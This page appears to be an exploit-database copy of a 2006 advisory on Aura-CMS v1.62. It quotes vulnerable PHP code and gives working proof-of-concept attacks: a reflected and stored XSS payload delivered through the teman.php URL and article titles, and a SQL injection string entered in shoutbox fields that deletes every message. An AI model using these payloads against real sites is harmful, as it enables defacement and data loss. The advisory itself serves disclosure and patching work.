Advertisement






Aura-CMS v1.62 XSS vulnerable

CVE Category Price Severity
CVE-2018-20455 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2006-07-25
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006070077

Below is a copy:

by : iFX a.k.a inversFX
  _______________________________
[	apem-zigzag (at) telkom (dot) net [email concealed]	]
[	inversfx (at) yahoo (dot) com [email concealed]	]
  -------------------------------
locate : Indonesia, Jakarta
--------------------------------
date   : 29/06/2006
--------------------------------
title  : XSS on `CMS Aura v1.62`
--------------------------------
Developer CMS : Arif Supriyanto - arif (at) ayo.kliksini (dot) com [email concealed]
   	        http://www.auracms.tk
                 http://www.semarang.tk
	        http://www.ayo.kliksini.com
  	        http://www.auracms.opensource-indonesia.com
--------------------------------

PoC :
--------------------------------------------------------------------

1.  in 'teman.php' we can see the code :

.....
echo "<p class=judul>Kirim ke Teman</p>
<p class=konten>Anda ingin memberitahu teman Anda tentang 
artikel ini yang berjudul
: <b>$judul_artikel</b>.";
.....

we found something here, that's variable $judul_artikel
	so we can xss from the url :

1st ex:
	http://localhost/teman.php?judul_artikel=<script>alert("mati 
dah gwa!!!")</script>

2nd ex:
	or we can send an artikel to admin and the title had the 
XSS code, so when anonymous is
	opening the index.php, the script are running.
---------------------------------------------------------------------

2.  we found something here that can be delete all 
shoutbox message.
	as usually we can shout anonymously with fake name, mail, 
pesan.
	here when I insert
  
name  = ' or ''='                       <== old SQL 
injection code
mail  = test_string			<== you can fill it with free mail 
address
pesan = ' or ''='			<== old SQL injection code
  
then all message on it clear amazingly....

----------------------------------------------------------------------
screen shot :
http://h1.ripway.com/lintah/adv/img/01-iFX-2006-AuraCMS-v1.62-XSS.bmp
origin :
http://h1.ripway.com/lintah/adv/txt/01-iFX-2006-AuraCMS-v1.62-XSS-Bug.tx
t
----------------------------------------------------------------------

sory for my words In English, cuz I often REMED!!!
   					                           _________________
                                                            
       /Shout :|       |X|
------------------------------------------------------------------------
-------------
|ECHO's kommunity & Staff, Kecoak kommunity, Jasakom 
kommunity, all hacker kommunity|
|$pecial to : cR45H3R, Dr.Pluto, he4rt_bre4ker, bius, 
||||||||.			    |
|Lintah{ iFX, BlueJaccker, Sin~X, Xploid, frezZe, 
Shock-3d, G4mMa, Big_Red_One }    |
------------------------------------------------------------------------
-------------
							       |OK | Apply | Cancel |
							       ----------------------
========================================================================
================
Simak preview pertandingan piala dunia 2006 di http://telkom.net/pialadunia/

Asah pengetahuanmu tentang Piala Dunia di  
http://netkuis.telkom.net/pialadunia/
========================================================================
================

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum